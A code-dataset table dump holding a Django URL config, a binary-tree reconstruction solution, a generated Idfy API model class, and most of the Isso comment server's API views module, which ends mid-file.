ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M)
---|---|---|
py | 7dfab8d687cb4d90230788d66b49036c88519e27 | from django.urls import path
from user import views
app_name = 'user'
urlpatterns = [
path('create/', views.CreateUserView.as_view(), name='create'),
path('token/', views.CreateTokenView.as_view(), name='token'),
path('me/', views.ManageUserView.as_view(), name='me'),
]
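# Hedged usage note (added commentary, not part of the original file): with
# app_name = 'user', these routes are addressed by their namespaced names, e.g.
#
#     from django.urls import reverse
#     reverse('user:create')   # resolves to the CreateUserView endpoint
#     reverse('user:me')       # resolves to the ManageUserView endpoint
#
# assuming this module is included in the project urlconf under some prefix.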
|
py | 7dfab8ed1422bded65ffc0b5d8a49608c9b9b239 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:
def dfs(stop):
if preorder and inorder[-1] != stop:
root = TreeNode(preorder.pop())
root.left = dfs(root.val)
inorder.pop()
root.right = dfs(stop)
return root
preorder.reverse()
inorder.reverse()
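# Added explanatory comments (not in the original solution): both lists are
# reversed so that pop() removes the logical front element in O(1). dfs(stop)
# keeps consuming preorder values until the current inorder value equals
# `stop`, which marks the end of the current left subtree, so the whole tree
# is rebuilt in O(n) without any index lookups.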
return dfs(None)
|
py | 7dfab9c7066087018ae0e43a33c22b383787a503 | # -*- coding: utf-8 -*-
"""
idfy_rest_client.models.template_with_id_preview
This file was automatically generated for Idfy by APIMATIC v2.0 ( https://apimatic.io )
"""
class TemplateWithIdPreview(object):
"""Implementation of the 'TemplateWithIdPreview' model.
TODO: type model description here.
Attributes:
primary_language (PrimaryLanguage): Primary language to use in the
preview (required)
secondary_language (SecondaryLanguage): Secondary language to use in
the preview (optional)
xml_signature (string): Xml package signature in base64 encoding
"""
# Create a mapping from Model property names to API property names
_names = {
"primary_language":'PrimaryLanguage',
"secondary_language":'SecondaryLanguage',
"xml_signature":'XmlSignature'
}
def __init__(self,
primary_language=None,
secondary_language=None,
xml_signature=None,
additional_properties = {}):
"""Constructor for the TemplateWithIdPreview class"""
# Initialize members of the class
self.primary_language = primary_language
self.secondary_language = secondary_language
self.xml_signature = xml_signature
# Add additional model properties to the instance
self.additional_properties = additional_properties
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
primary_language = dictionary.get('PrimaryLanguage')
secondary_language = dictionary.get('SecondaryLanguage')
xml_signature = dictionary.get('XmlSignature')
# Clean out expected properties from dictionary
for key in cls._names.values():
if key in dictionary:
del dictionary[key]
# Return an object of this model
return cls(primary_language,
secondary_language,
xml_signature,
dictionary)
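# Hedged usage sketch (added, not part of the generated file): keys must match
# the API property names defined in `_names`; values are passed through
# untouched, e.g.
#
#     payload = {"PrimaryLanguage": "EN", "XmlSignature": "PHhtbC8+"}
#     preview = TemplateWithIdPreview.from_dictionary(payload)
#     # preview.primary_language == "EN"; any unrecognised keys end up in
#     # preview.additional_properties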
|
py | 7dfabafde754ee4c2415226dce47623e2671630f | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import collections
import re
import time
import functools
import json # json.dumps to put URL in <script>
from datetime import datetime, timedelta
from itsdangerous import SignatureExpired, BadSignature
from xml.etree import ElementTree as ET
from werkzeug.http import dump_cookie
from werkzeug.wsgi import get_current_url
from werkzeug.utils import redirect
from werkzeug.routing import Rule
from werkzeug.wrappers import Response
from werkzeug.exceptions import BadRequest, Forbidden, NotFound
from isso.compat import text_type as str
from isso import utils, local
from isso.utils import (http, parse,
JSONResponse as JSON, XMLResponse as XML,
render_template)
from isso.views import requires
from isso.utils.hash import sha1
from isso.utils.hash import md5
try:
from cgi import escape
except ImportError:
from html import escape
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
# from Django apparently, looks good to me *duck*
__url_re = re.compile(
r'^'
r'(https?://)?'
# domain...
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)'
r'$', re.IGNORECASE)
def isurl(text):
return __url_re.match(text) is not None
def normalize(url):
if not url.startswith(("http://", "https://")):
return "http://" + url
return url
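# Hedged examples (added commentary, not part of the original module):
#
#     isurl("example.com")              # True  -> bare domains are accepted
#     isurl("https://example.com/a/b")  # True
#     isurl("not a url")                # False -> rejected by __url_re
#     normalize("example.com")          # "http://example.com"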
def xhr(func):
"""A decorator to check for CSRF on POST/PUT/DELETE using a <form>
element and JS to execute automatically (see #40 for a proof-of-concept).
When an attacker uses a <form> to downvote a comment, the browser *should*
add a `Content-Type: ...` header with three possible values:
* application/x-www-form-urlencoded
* multipart/form-data
* text/plain
If the header is not sent or requests `application/json`, the request is
not forged (XHR is restricted by CORS separately).
"""
"""
@apiDefine csrf
@apiHeader {string="application/json"} Content-Type
The content type must be set to `application/json` to prevent CSRF attacks.
"""
def dec(self, env, req, *args, **kwargs):
if req.content_type and not req.content_type.startswith("application/json"):
raise Forbidden("CSRF")
return func(self, env, req, *args, **kwargs)
return dec
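# Illustrative check (added commentary, not part of the original module): a
# plain HTML <form> can only submit the three content types listed above, so
# a request such as
#
#     curl -X POST 'https://comments.example.com/id/1/like' \
#          -H 'Content-Type: application/json'
#
# passes this guard, while a forged form submission sent as
# application/x-www-form-urlencoded is rejected with 403 Forbidden.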
class API(object):
FIELDS = set(['id', 'parent', 'text', 'author', 'website',
'mode', 'created', 'modified', 'likes', 'dislikes', 'hash', 'gravatar_image', 'notification'])
# comment fields that can be submitted
ACCEPT = set(['text', 'author', 'website', 'email', 'parent', 'title', 'notification'])
VIEWS = [
('fetch', ('GET', '/')),
('new', ('POST', '/new')),
('count', ('GET', '/count')),
('counts', ('POST', '/count')),
('feed', ('GET', '/feed')),
('latest', ('GET', '/latest')),
('view', ('GET', '/id/<int:id>')),
('edit', ('PUT', '/id/<int:id>')),
('delete', ('DELETE', '/id/<int:id>')),
('unsubscribe', ('GET', '/id/<int:id>/unsubscribe/<string:email>/<string:key>')),
('moderate', ('GET', '/id/<int:id>/<any(edit,activate,delete):action>/<string:key>')),
('moderate', ('POST', '/id/<int:id>/<any(edit,activate,delete):action>/<string:key>')),
('like', ('POST', '/id/<int:id>/like')),
('dislike', ('POST', '/id/<int:id>/dislike')),
('demo', ('GET', '/demo')),
('preview', ('POST', '/preview')),
('login', ('POST', '/login')),
('admin', ('GET', '/admin'))
]
def __init__(self, isso, hasher):
self.isso = isso
self.hash = hasher.uhash
self.cache = isso.cache
self.signal = isso.signal
self.conf = isso.conf.section("general")
self.moderated = isso.conf.getboolean("moderation", "enabled")
# this is similar to the wordpress setting "Comment author must have a previously approved comment"
self.approve_if_email_previously_approved = isso.conf.getboolean("moderation", "approve-if-email-previously-approved")
self.guard = isso.db.guard
self.threads = isso.db.threads
self.comments = isso.db.comments
for (view, (method, path)) in self.VIEWS:
isso.urls.add(
Rule(path, methods=[method], endpoint=getattr(self, view)))
@classmethod
def verify(cls, comment):
if "text" not in comment:
return False, "text is missing"
if not isinstance(comment.get("parent"), (int, type(None))):
return False, "parent must be an integer or null"
for key in ("text", "author", "website", "email"):
if not isinstance(comment.get(key), (str, type(None))):
return False, "%s must be a string or null" % key
if len(comment["text"].rstrip()) < 3:
return False, "text is too short (minimum length: 3)"
if len(comment["text"]) > 65535:
return False, "text is too long (maximum length: 65535)"
if len(comment.get("email") or "") > 254:
return False, "http://tools.ietf.org/html/rfc5321#section-4.5.3"
if comment.get("website"):
if len(comment["website"]) > 254:
return False, "arbitrary length limit"
if not isurl(comment["website"]):
return False, "Website not Django-conform"
return True, ""
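# Hedged examples (added commentary): API.verify returns (True, "") for a
# minimal payload such as
#
#     {"text": "Nice post!", "parent": None, "author": None,
#      "website": None, "email": None}
#
# and (False, reason) when "text" is missing or shorter than three characters
# after stripping, when "parent" is neither an integer nor null, or when
# "website" is set but fails isurl().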
# Common definitions for apidoc follow:
"""
@apiDefine plainParam
@apiParam {number=0,1} [plain]
Iff set to `1`, the plain text entered by the user will be returned in the comments’ `text` attribute (instead of the rendered markdown).
"""
"""
@apiDefine commentResponse
@apiSuccess {number} id
The comment’s id (assigned by the server).
@apiSuccess {number} parent
Id of the comment this comment is a reply to. `null` if this is a top-level-comment.
@apiSuccess {number=1,2,4} mode
The comment’s mode:
value | explanation
--- | ---
`1` | accepted: The comment was accepted by the server and is published.
`2` | in moderation queue: The comment was accepted by the server but awaits moderation.
`4` | deleted, but referenced: The comment was deleted on the server but is still referenced by replies.
@apiSuccess {string} author
The comment’s author’s name or `null`.
@apiSuccess {string} website
The comment’s author’s website or `null`.
@apiSuccess {string} hash
A hash uniquely identifying the comment’s author.
@apiSuccess {number} created
UNIX timestamp of the time the comment was created (on the server).
@apiSuccess {number} modified
UNIX timestamp of the time the comment was last modified (on the server). `null` if the comment was not yet modified.
"""
"""
@api {post} /new create new
@apiGroup Comment
@apiDescription
Creates a new comment. The response will set a cookie on the requestor to enable them to later edit the comment.
@apiUse csrf
@apiParam {string} uri
The uri of the thread to create the comment on.
@apiParam {string} text
The comment’s raw text.
@apiParam {string} [author]
The comment’s author’s name.
@apiParam {string} [email]
The comment’s author’s email address.
@apiParam {string} [website]
The comment’s author’s website’s url.
@apiParam {number} [parent]
The parent comment’s id iff the new comment is a response to an existing comment.
@apiExample {curl} Create a reply to comment with id 15:
curl 'https://comments.example.com/new?uri=/thread/' -d '{"text": "Stop saying that! *isso*!", "author": "Max Rant", "email": "[email protected]", "parent": 15}' -H 'Content-Type: application/json' -c cookie.txt
@apiUse commentResponse
@apiSuccessExample Success after the above request:
{
"website": null,
"author": "Max Rant",
"parent": 15,
"created": 1464940838.254393,
"text": "<p>Stop saying that! <em>isso</em>!</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"hash": "e644f6ee43c0",
"id": 23,
"likes": 0
}
"""
@xhr
@requires(str, 'uri')
def new(self, environ, request, uri):
data = request.get_json()
for field in set(data.keys()) - API.ACCEPT:
data.pop(field)
for key in ("author", "email", "website", "parent"):
data.setdefault(key, None)
valid, reason = API.verify(data)
if not valid:
return BadRequest(reason)
for field in ("author", "email", "website"):
if data.get(field) is not None:
data[field] = escape(data[field], quote=False)
if data.get("website"):
data["website"] = normalize(data["website"])
data['mode'] = 2 if self.moderated else 1
data['remote_addr'] = utils.anonymize(str(request.remote_addr))
with self.isso.lock:
if uri not in self.threads:
if 'title' not in data:
with http.curl('GET', local("origin"), uri) as resp:
if resp and resp.status == 200:
uri, title = parse.thread(resp.read(), id=uri)
else:
return NotFound('URI does not exist: %s' % uri)
else:
title = data['title']
thread = self.threads.new(uri, title)
self.signal("comments.new:new-thread", thread)
else:
thread = self.threads[uri]
# notify extensions that the new comment is about to be saved
self.signal("comments.new:before-save", thread, data)
valid, reason = self.guard.validate(uri, data)
if not valid:
self.signal("comments.new:guard", reason)
raise Forbidden(reason)
with self.isso.lock:
# if email-based auto-moderation enabled, check for previously approved author
# right before approval.
if self.approve_if_email_previously_approved and self.comments.is_previously_approved_author(data['email']):
data['mode'] = 1
rv = self.comments.add(uri, data)
# notify extensions that the new comment has been successfully saved
self.signal("comments.new:after-save", thread, rv)
cookie = functools.partial(dump_cookie,
value=self.isso.sign(
[rv["id"], sha1(rv["text"])]),
max_age=self.conf.getint('max-age'))
rv["text"] = self.isso.render(rv["text"])
rv["hash"] = self.hash(rv['email'] or rv['remote_addr'])
self.cache.set(
'hash', (rv['email'] or rv['remote_addr']).encode('utf-8'), rv['hash'])
rv = self._add_gravatar_image(rv)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
# success!
self.signal("comments.new:finish", thread, rv)
resp = JSON(rv, 202 if rv["mode"] == 2 else 201)
resp.headers.add("Set-Cookie", cookie(str(rv["id"])))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % rv["id"]))
return resp
"""
@api {get} /id/:id view
@apiGroup Comment
@apiParam {number} id
The id of the comment to view.
@apiUse plainParam
@apiExample {curl} View the comment with id 4:
curl 'https://comments.example.com/id/4'
@apiUse commentResponse
@apiSuccessExample Example result:
{
"website": null,
"author": null,
"parent": null,
"created": 1464914341.312426,
"text": " <p>I want to use MySQL</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"id": 4,
"likes": 1
}
"""
def view(self, environ, request, id):
rv = self.comments.get(id)
if rv is None:
raise NotFound
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
if request.args.get('plain', '0') == '0':
rv['text'] = self.isso.render(rv['text'])
return JSON(rv, 200)
"""
@api {put} /id/:id edit
@apiGroup Comment
@apiDescription
Edit an existing comment. Editing a comment is only possible for a short period of time after it was created and only if the requestor has a valid cookie for it. See the [isso server documentation](https://posativ.org/isso/docs/configuration/server) for details. Editing a comment will set a new edit cookie in the response.
@apiUse csrf
@apiParam {number} id
The id of the comment to edit.
@apiParam {string} text
A new (raw) text for the comment.
@apiParam {string} [author]
The modified comment’s author’s name.
@apiParam {string} [website]
The modified comment’s author’s website.
@apiExample {curl} Edit comment with id 23:
curl -X PUT 'https://comments.example.com/id/23' -d '{"text": "I see your point. However, I still disagree.", "website": "maxrant.important.com"}' -H 'Content-Type: application/json' -b cookie.txt
@apiUse commentResponse
@apiSuccessExample Example response:
{
"website": "maxrant.important.com",
"author": "Max Rant",
"parent": 15,
"created": 1464940838.254393,
"text": "<p>I see your point. However, I still disagree.</p>",
"dislikes": 0,
"modified": 1464943439.073961,
"mode": 1,
"id": 23,
"likes": 0
}
"""
@xhr
def edit(self, environ, request, id):
try:
rv = self.isso.unsign(request.cookies.get(str(id), ''))
except (SignatureExpired, BadSignature):
raise Forbidden
if rv[0] != id:
raise Forbidden
# verify checksum, mallory might skip cookie deletion when he deletes a comment
if rv[1] != sha1(self.comments.get(id)["text"]):
raise Forbidden
data = request.get_json()
if "text" not in data or data["text"] is None or len(data["text"]) < 3:
raise BadRequest("no text given")
for key in set(data.keys()) - set(["text", "author", "website"]):
data.pop(key)
data['modified'] = time.time()
with self.isso.lock:
rv = self.comments.update(id, data)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.edit", rv)
cookie = functools.partial(dump_cookie,
value=self.isso.sign(
[rv["id"], sha1(rv["text"])]),
max_age=self.conf.getint('max-age'))
rv["text"] = self.isso.render(rv["text"])
resp = JSON(rv, 200)
resp.headers.add("Set-Cookie", cookie(str(rv["id"])))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % rv["id"]))
return resp
"""
@api {delete} /id/:id delete
@apiGroup Comment
@apiDescription
Delete an existing comment. Deleting a comment is only possible for a short period of time after it was created and only if the requestor has a valid cookie for it. See the [isso server documentation](https://posativ.org/isso/docs/configuration/server) for details.
@apiParam {number} id
Id of the comment to delete.
@apiExample {curl} Delete comment with id 14:
curl -X DELETE 'https://comments.example.com/id/14' -b cookie.txt
@apiSuccessExample Successful deletion returns null:
null
"""
@xhr
def delete(self, environ, request, id, key=None):
try:
rv = self.isso.unsign(request.cookies.get(str(id), ""))
except (SignatureExpired, BadSignature):
raise Forbidden
else:
if rv[0] != id:
raise Forbidden
# verify checksum, mallory might skip cookie deletion when he deletes a comment
if rv[1] != sha1(self.comments.get(id)["text"]):
raise Forbidden
item = self.comments.get(id)
if item is None:
raise NotFound
self.cache.delete(
'hash', (item['email'] or item['remote_addr']).encode('utf-8'))
with self.isso.lock:
rv = self.comments.delete(id)
if rv:
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.delete", id)
resp = JSON(rv, 200)
cookie = functools.partial(dump_cookie, expires=0, max_age=0)
resp.headers.add("Set-Cookie", cookie(str(id)))
resp.headers.add("X-Set-Cookie", cookie("isso-%i" % id))
return resp
"""
@api {get} /id/:id/unsubscribe/:email/:key unsubscribe
@apiGroup Comment
@apiDescription
Opt out from getting any further email notifications about replies to a particular comment. In order to use this endpoint, the requestor needs a `key` that is usually obtained from an email sent out by isso.
@apiParam {number} id
The id of the comment to unsubscribe from replies to.
@apiParam {string} email
The email address of the subscriber.
@apiParam {string} key
The key to authenticate the subscriber.
@apiExample {curl} Unsubscribe Alice from replies to comment with id 13:
curl -X GET 'https://comments.example.com/id/13/unsubscribe/[email protected]/WyJ1bnN1YnNjcmliZSIsImFsaWNlQGV4YW1wbGUuY29tIl0.DdcH9w.Wxou-l22ySLFkKUs7RUHnoM8Kos'
@apiSuccessExample {html} Using GET:
<!DOCTYPE html>
<html>
<head>
<script>
if (confirm('Delete: Are you sure?')) {
xhr = new XMLHttpRequest;
xhr.open('POST', window.location.href);
xhr.send(null);
}
</script>
@apiSuccessExample Using POST:
Yo
"""
def unsubscribe(self, environ, request, id, email, key):
email = unquote(email)
try:
rv = self.isso.unsign(key, max_age=2**32)
except (BadSignature, SignatureExpired):
raise Forbidden
if rv[0] != 'unsubscribe' or rv[1] != email:
raise Forbidden
item = self.comments.get(id)
if item is None:
raise NotFound
with self.isso.lock:
self.comments.unsubscribe(email, id)
modal = (
"<!DOCTYPE html>"
"<html>"
"<head>"
" <title>Successfully unsubscribed</title>"
"</head>"
"<body>"
" <p>You have been unsubscribed from replies in the given conversation.</p>"
"</body>"
"</html>")
return Response(modal, 200, content_type="text/html")
"""
@api {post} /id/:id/:action/:key moderate
@apiGroup Comment
@apiDescription
Publish or delete a comment that is in the moderation queue (mode `2`). In order to use this endpoint, the requestor needs a `key` that is usually obtained from an email sent out by isso.
This endpoint can also be used with a `GET` request. In that case, an HTML page is returned that asks the user to confirm the selected action. If they confirm, the request is repeated using `POST`.
@apiParam {number} id
The id of the comment to moderate.
@apiParam {string=activate,delete} action
`activate` to publish the comment (change its mode to `1`).
`delete` to delete the comment
@apiParam {string} key
The moderation key to authenticate the moderation.
@apiExample {curl} delete comment with id 13:
curl -X POST 'https://comments.example.com/id/13/delete/MTM.CjL6Fg.REIdVXa-whJS_x8ojQL4RrXnuF4'
@apiSuccessExample {html} Using GET:
<!DOCTYPE html>
<html>
<head>
<script>
if (confirm('Delete: Are you sure?')) {
xhr = new XMLHttpRequest;
xhr.open('POST', window.location.href);
xhr.send(null);
xhr.onload = function() {
window.location.href = "https://example.com/example-thread/#isso-13";
};
}
</script>
@apiSuccessExample Using POST:
Yo
"""
def moderate(self, environ, request, id, action, key):
try:
id = self.isso.unsign(key, max_age=2**32)
except (BadSignature, SignatureExpired):
raise Forbidden
item = self.comments.get(id)
if item is None:
raise NotFound
thread = self.threads.get(item['tid'])
link = local("origin") + thread["uri"] + "#isso-%i" % item["id"]
if request.method == "GET":
modal = (
"<!DOCTYPE html>"
"<html>"
"<head>"
"<script>"
" if (confirm('%s: Are you sure?')) {"
" xhr = new XMLHttpRequest;"
" xhr.open('POST', window.location.href);"
" xhr.send(null);"
" xhr.onload = function() {"
" window.location.href = %s;"
" };"
" }"
"</script>" % (action.capitalize(), json.dumps(link)))
return Response(modal, 200, content_type="text/html")
if action == "activate":
if item['mode'] == 1:
return Response("Already activated", 200)
with self.isso.lock:
self.comments.activate(id)
self.signal("comments.activate", thread, item)
return Response("Yo", 200)
elif action == "edit":
data = request.get_json()
with self.isso.lock:
rv = self.comments.update(id, data)
for key in set(rv.keys()) - API.FIELDS:
rv.pop(key)
self.signal("comments.edit", rv)
return JSON(rv, 200)
else:
with self.isso.lock:
self.comments.delete(id)
self.cache.delete(
'hash', (item['email'] or item['remote_addr']).encode('utf-8'))
self.signal("comments.delete", id)
return Response("Yo", 200)
"""
@api {get} / get comments
@apiGroup Thread
@apiDescription Queries the comments of a thread.
@apiParam {string} uri
The URI of thread to get the comments from.
@apiParam {number} [parent]
Return only comments that are children of the comment with the provided ID.
@apiUse plainParam
@apiParam {number} [limit]
The maximum number of returned top-level comments. Omit for unlimited results.
@apiParam {number} [nested_limit]
The maximum number of returned nested comments per comment. Omit for unlimited results.
@apiParam {number} [after]
Include only comments that were added after the provided UNIX timestamp.
@apiSuccess {number} total_replies
The number of replies if the `limit` parameter was not set. If `after` is set to `X`, this is the number of comments that were created after `X`. So setting `after` may change this value!
@apiSuccess {Object[]} replies
The list of comments. Each comment also has the `total_replies`, `replies`, `id` and `hidden_replies` properties to represent nested comments.
@apiSuccess {number} id
Id of the comment whose replies are listed in `replies`. `null` for the list of top-level comments.
@apiSuccess {number} hidden_replies
The number of comments that were omitted from the results because of the `limit` request parameter. Usually, this will be `total_replies` - `limit`.
@apiExample {curl} Get 2 comments with 5 responses:
curl 'https://comments.example.com/?uri=/thread/&limit=2&nested_limit=5'
@apiSuccessExample Example response:
{
"total_replies": 14,
"replies": [
{
"website": null,
"author": null,
"parent": null,
"created": 1464818460.732863,
"text": "<p>Hello, World!</p>",
"total_replies": 1,
"hidden_replies": 0,
"dislikes": 2,
"modified": null,
"mode": 1,
"replies": [
{
"website": null,
"author": null,
"parent": 1,
"created": 1464818460.769638,
"text": "<p>Hi, now some Markdown: <em>Italic</em>, <strong>bold</strong>, <code>monospace</code>.</p>",
"dislikes": 0,
"modified": null,
"mode": 1,
"hash": "2af4e1a6c96a",
"id": 2,
"likes": 2
}
],
"hash": "1cb6cc0309a2",
"id": 1,
"likes": 2
},
{
"website": null,
"author": null,
"parent": null,
"created": 1464818460.80574,
"text": "<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Accusantium at commodi cum deserunt dolore, error fugiat harum incidunt, ipsa ipsum mollitia nam provident rerum sapiente suscipit tempora vitae? Est, qui?</p>",
"total_replies": 0,
"hidden_replies": 0,
"dislikes": 0,
"modified": null,
"mode": 1,
"replies": [],
"hash": "1cb6cc0309a2",
"id": 3,
"likes": 0
}
],
"id": null,
"hidden_replies": 12
}
"""
@requires(str, 'uri')
def fetch(self, environ, request, uri):
args = {
'uri': uri,
'after': request.args.get('after', 0)
}
try:
args['limit'] = int(request.args.get('limit'))
except TypeError:
args['limit'] = None
except ValueError:
return BadRequest("limit should be integer")
if request.args.get('parent') is not None:
try:
args['parent'] = int(request.args.get('parent'))
root_id = args['parent']
except ValueError:
return BadRequest("parent should be integer")
else:
args['parent'] = None
root_id = None
plain = request.args.get('plain', '0') == '0'
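# (added note) despite its name, the flag above is True when the `plain`
# query arg is absent or '0', i.e. when the stored Markdown should be
# rendered to HTML by _process_fetched_list before being returned.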
reply_counts = self.comments.reply_count(uri, after=args['after'])
if args['limit'] == 0:
root_list = []
else:
root_list = list(self.comments.fetch(**args))
if root_id not in reply_counts:
reply_counts[root_id] = 0
try:
nested_limit = int(request.args.get('nested_limit'))
except TypeError:
nested_limit = None
except ValueError:
return BadRequest("nested_limit should be integer")
rv = {
'id': root_id,
'total_replies': reply_counts[root_id],
'hidden_replies': reply_counts[root_id] - len(root_list),
'replies': self._process_fetched_list(root_list, plain)
}
# We are only checking for one level deep comments
if root_id is None:
for comment in rv['replies']:
if comment['id'] in reply_counts:
comment['total_replies'] = reply_counts[comment['id']]
if nested_limit is not None:
if nested_limit > 0:
args['parent'] = comment['id']
args['limit'] = nested_limit
replies = list(self.comments.fetch(**args))
else:
replies = []
else:
args['parent'] = comment['id']
replies = list(self.comments.fetch(**args))
else:
comment['total_replies'] = 0
replies = []
comment['hidden_replies'] = comment['total_replies'] - \
len(replies)
comment['replies'] = self._process_fetched_list(replies, plain)
return JSON(rv, 200)
def _add_gravatar_image(self, item):
if not self.conf.getboolean('gravatar'):
return item
email = item['email'] or item['author'] or ''
email_md5_hash = md5(email)
gravatar_url = self.conf.get('gravatar-url')
item['gravatar_image'] = gravatar_url.format(email_md5_hash)
return item
def _process_fetched_list(self, fetched_list, plain=False):
for item in fetched_list:
key = item['email'] or item['remote_addr']
val = self.cache.get('hash', key.encode('utf-8'))
if val is None:
val = self.hash(key)
self.cache.set('hash', key.encode('utf-8'), val)
item['hash'] = val
item = self._add_gravatar_image(item)
for key in set(item.keys()) - API.FIELDS:
item.pop(key)
if plain:
for item in fetched_list:
item['text'] = self.isso.render(item['text'])
return fetched_list
"""
@apiDefine likeResponse
@apiSuccess {number} likes
The (new) number of likes on the comment.
@apiSuccess {number} dislikes
The (new) number of dislikes on the comment.
"""
"""
@api {post} /id/:id/like like
@apiGroup Comment
@apiDescription
Puts a “like” on a comment. The author of a comment cannot like its own comment.
@apiParam {number} id
The id of the comment to like.
@apiExample {curl} Like comment with id 23:
curl -X POST 'https://comments.example.com/id/23/like'
@apiUse likeResponse
@apiSuccessExample Example response
{
"likes": 5,
"dislikes": 2
}
"""
@xhr
def like(self, environ, request, id):
nv = self.comments.vote(
True, id, utils.anonymize(str(request.remote_addr)))
return JSON(nv, 200)
"""
@api {post} /id/:id/dislike dislike
@apiGroup Comment
@apiDescription
Puts a “dislike” on a comment. The author of a comment cannot dislike its own comment.
@apiParam {number} id
The id of the comment to dislike.
@apiExample {curl} Dislike comment with id 23:
curl -X POST 'https://comments.example.com/id/23/dislike'
@apiUse likeResponse
@apiSuccessExample Example response
{
"likes": 4,
"dislikes": 3
}
"""
@xhr
def dislike(self, environ, request, id):
nv = self.comments.vote(
False, id, utils.anonymize(str(request.remote_addr)))
return JSON(nv, 200)
# TODO: remove someday (replaced by :func:`counts`)
@requires(str, 'uri')
def count(self, environ, request, uri):
rv = self.comments.count(uri)[0]
if rv == 0:
raise NotFound
return JSON(rv, 200)
"""
@api {post} /count count comments
@apiGroup Thread
@apiDescription
Counts the number of comments on multiple threads. The requestor provides a list of thread uris. The number of comments on each thread is returned as a list, in the same order as the threads were requested. The counts include comments that are responses to comments.
@apiExample {curl} get the count of 5 threads:
curl 'https://comments.example.com/count' -d '["/blog/firstPost.html", "/blog/controversalPost.html", "/blog/howToCode.html", "/blog/boringPost.html", "/blog/isso.html"]'
@apiSuccessExample Counts of 5 threads:
[2, 18, 4, 0, 3]
"""
def counts(self, environ, request):
data = request.get_json()
if not isinstance(data, list) or not all(isinstance(x, str) for x in data):
raise BadRequest("JSON must be a list of URLs")
return JSON(self.comments.count(*data), 200)
"""
@api {get} /feed Atom feed for comments
@apiGroup Thread
@apiDescription
Provide an Atom feed for the given thread.
"""
@requires(str, 'uri')
def feed(self, environ, request, uri):
conf = self.isso.conf.section("rss")
if not conf.get('base'):
raise NotFound
args = {
'uri': uri,
'order_by': 'id',
'asc': 0,
'limit': conf.getint('limit')
}
try:
args['limit'] = max(int(request.args.get('limit')), args['limit'])
except TypeError:
pass
except ValueError:
return BadRequest("limit should be integer")
comments = self.comments.fetch(**args)
base = conf.get('base').rstrip('/')
hostname = urlparse(base).netloc
# Let's build an Atom feed.
# RFC 4287: https://tools.ietf.org/html/rfc4287
# RFC 4685: https://tools.ietf.org/html/rfc4685 (threading extensions)
# For IDs: http://web.archive.org/web/20110514113830/http://diveintomark.org/archives/2004/05/28/howto-atom-id
feed = ET.Element('feed', {
'xmlns': 'http://www.w3.org/2005/Atom',
'xmlns:thr': 'http://purl.org/syndication/thread/1.0'
})
# For feed ID, we would use thread ID, but we may not have
# one. Therefore, we use the URI. We don't have a year
# either...
id = ET.SubElement(feed, 'id')
id.text = 'tag:{hostname},2018:/isso/thread{uri}'.format(
hostname=hostname, uri=uri)
# For title, we don't have much either. Be pretty generic.
title = ET.SubElement(feed, 'title')
title.text = 'Comments for {hostname}{uri}'.format(
hostname=hostname, uri=uri)
comment0 = None
for comment in comments:
if comment0 is None:
comment0 = comment
entry = ET.SubElement(feed, 'entry')
# We don't use a real date in ID either to help with
# threading.
id = ET.SubElement(entry, 'id')
id.text = 'tag:{hostname},2018:/isso/{tid}/{id}'.format(
hostname=hostname,
tid=comment['tid'],
id=comment['id'])
title = ET.SubElement(entry, 'title')
title.text = 'Comment #{}'.format(comment['id'])
updated = ET.SubElement(entry, 'updated')
updated.text = '{}Z'.format(datetime.fromtimestamp(
comment['modified'] or comment['created']).isoformat())
author = ET.SubElement(entry, 'author')
name = ET.SubElement(author, 'name')
name.text = comment['author']
ET.SubElement(entry, 'link', {
'href': '{base}{uri}#isso-{id}'.format(
base=base,
uri=uri, id=comment['id'])
})
content = ET.SubElement(entry, 'content', {
'type': 'html',
})
content.text = self.isso.render(comment['text'])
if comment['parent']:
ET.SubElement(entry, 'thr:in-reply-to', {
'ref': 'tag:{hostname},2018:/isso/{tid}/{id}'.format(
hostname=hostname,
tid=comment['tid'],
id=comment['parent']),
'href': '{base}{uri}#isso-{id}'.format(
base=base,
uri=uri, id=comment['parent'])
})
# Updated is mandatory. If we have comments, we use the date
# of last modification of the first one (which is the last
# one). Otherwise, we use a fixed date.
updated = ET.Element('updated')
if comment0 is None:
updated.text = '1970-01-01T01:00:00Z'
else:
updated.text = datetime.fromtimestamp(
comment0['modified'] or comment0['created']).isoformat()
updated.text += 'Z'
feed.insert(0, updated)
output = StringIO()
ET.ElementTree(feed).write(output,
encoding='utf-8',
xml_declaration=True)
response = XML(output.getvalue(), 200)
# Add an etag/last-modified value for caching purpose
if comment0 is None:
response.set_etag('empty')
response.last_modified = 0
else:
response.set_etag('{tid}-{id}'.format(**comment0))
response.last_modified = comment0['modified'] or comment0['created']
return response.make_conditional(request)
def preview(self, environment, request):
data = request.get_json()
if "text" not in data or data["text"] is None:
raise BadRequest("no text given")
return JSON({'text': self.isso.render(data["text"])}, 200)
def demo(self, env, req):
return redirect(
get_current_url(env, strip_querystring=True) + '/index.html'
)
def login(self, env, req):
